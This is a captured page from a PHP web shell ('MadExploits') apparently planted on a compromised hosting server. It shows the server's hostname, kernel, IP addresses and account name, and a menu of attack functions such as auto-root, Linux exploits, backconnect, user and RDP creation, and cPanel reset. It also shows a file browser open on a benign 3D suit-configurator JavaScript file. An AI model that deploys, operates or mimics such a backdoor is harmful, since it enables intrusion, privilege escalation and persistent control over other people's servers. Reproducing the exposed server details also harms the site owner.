Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.16.203.175
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
new-3d-demo /
bikni_2 /
[ HOME SHELL ]
Name
Size
Permission
Action
3D
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
nbproject
[ DIR ]
drwxr-xr-x
GLTFLoader.js
40.04
KB
-rw-r--r--
OrbitControls.js
10.7
KB
-rw-r--r--
base-3d.js
74.12
KB
-rw-r--r--
display-3d.js
18.33
KB
-rw-r--r--
index.php
1.91
KB
-rw-r--r--
suit3pcs.js
8.13
KB
-rw-r--r--
sz-utils.js
15.37
KB
-rw-r--r--
sz.js
11.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : suit3pcs.js
Sz.packages(function (Sz, window, document) { var DesignOptions = { Version: "3D", Product: "Suit3pcs", Fabric: { id: "656050", name: "Dark Navy", type: "THE NAVY", Category: { id: "SolidColor", alias: "SOLID COLOR", name: "Solid Colors" } }, Jacket: { Button: { id: "2Button", name: "2 Buttons, Single Breasted", style: "Single", close: "2Button" }, Lapel: { id: "CL2", name: "Notch Lapel", Buttonhole: { id: "No", name: "No Button Hole" }, Width: { id: "Regular", name: "Regular" } }, Bottom: { id: "Curved", name: "Curved" }, Pocket: { id: "PK-1", name: "2 Straight Pockets", Breast: true }, Sleeve: { id: "4Working", name: "4 Working Buttons", button: "4Button", style: "Working" }, Vent: { id: "NoVent", name: "No Vent" } }, Pant: { Style: { id: "Normal", name: "Normal/Straight" }, Pleats: { id: "1Pleats", name: "Single Pleat" }, Pocket: { id: "Slanted", name: "Slanted" }, BackPocket: { id: "Single", name: "Single Opening", button: false, Position: { id: "Right", name: "Right" } }, Beltloops: { id: "Single", name: "Single", button: false, Waistband: { id: "Normal", name: "Normal", button: false } }, Cuff: { id: "None", name: "Regular", button: false } }, Vest: { Neckline: { id: "VNeck", name: "V Neck" }, Button: { id: "6Button", name: "6 Buttons" }, Pocket: { id: "final_garment_in_pink", name: "Single Opening" }, Bottom: { id: "final_dummy", name: "Angle Cut" }, Back: { id: "Plain", name: "Plain" } }, Contrast: { id: "3799-2", name: null, Jacket: { LapelUpper: false, LapelLower: false, Pocket: false, ChestPocket: false, Elbow: false, Lining: { id: "5", name: "Gray", Style: { id: "FullyLined", name: "Fully Lined" } }, Piping: { id: "A1", name: "IVory" }, BackCollar: { id: "001", name: "Black" }, Button: { id: "S8", name: "Black" }, Buttonhole: { id: "A91", name: "Chacoal", code: "#676b6a" }, LastButtonhole: { id: "None", name: "None", code: null }, Topstitching: { id: "No", name: "No", Option: { id: "1", name: "Color on color", description: "Option 1: Color on color" }, Color: { id: "A8", name: "White", code: "#ffffff" } }, Monogram: { id: "No-Mono", name: "No Monogram", option: false, Initial: null, FontStyle: "italic", Specially: true, Color: { id: "A8", name: "White", code: "#ffffff" } } }, Pant: { Beltloops: false, BackPocket: false, Button: { id: "S8", name: "Black" }, Buttonhole: { id: "A91", name: "Chacoal", code: "#676b6a" } }, Vest: { Pocket: false, Lapel: false, Lining: { id: "5", name: "Gray", Style: { id: "FullyLined", name: "Fully Lined" } }, Piping: { id: "A16", name: "Faint Yellow" }, Button: { id: "S8", name: "Black" }, Buttonhole: { id: "A91", name: "Chacoal", code: "#676b6a" } } } }; Sz.add("Display3D", function (Datastore) { Sz.extend(Datastore, { preview: ["Jacket", "Pant", "Vest"], history: [] }); function Display3D(callback) { if (Sz.isFunction(callback)) { Datastore.Models.push(callback); } return Object.assign({}, DesignOptions); } Display3D.progress = function (value) { }; Display3D.errors = function (err) { }; return Display3D; }); (function (Base3D) { if (Sz.isFunction(Base3D)) { Base3D({ canvas: document.getElementById("base3d"), routes: { site: "./", Res3D: "./bikni_2/3D" } }, function () { Sz.Display3D(Base3D.Jacket); Sz.Display3D(Base3D.Pant); Sz.Display3D(Base3D.Vest); Sz.Display3D(Base3D.JacketInteriorLining); Sz.Display3D(Base3D.BackCollar); Sz.Display3D.setState(Base3D.instance, { name: "Default" }); }); Base3D.instance.Controls.Orbit.addEventListener("end", function () { Sz.Display3D.setState(Base3D.instance); }); Sz.Display3D.render(); } })(Sz.Base3D); //Jquery if need $(function () { $("#fabric").on("click", "li", function () { DesignOptions.Fabric.id = $(this).data("id"); Sz.Display3D.render(); }); $("#jacket-style").on("click", "li", function () { DesignOptions.Vest.Pocket.id = $(this).data("id"); //alert(DesignOptions.Vest.Bottom.id); Sz.Display3D.render(); }); }); }); Sz.packages.run();
Close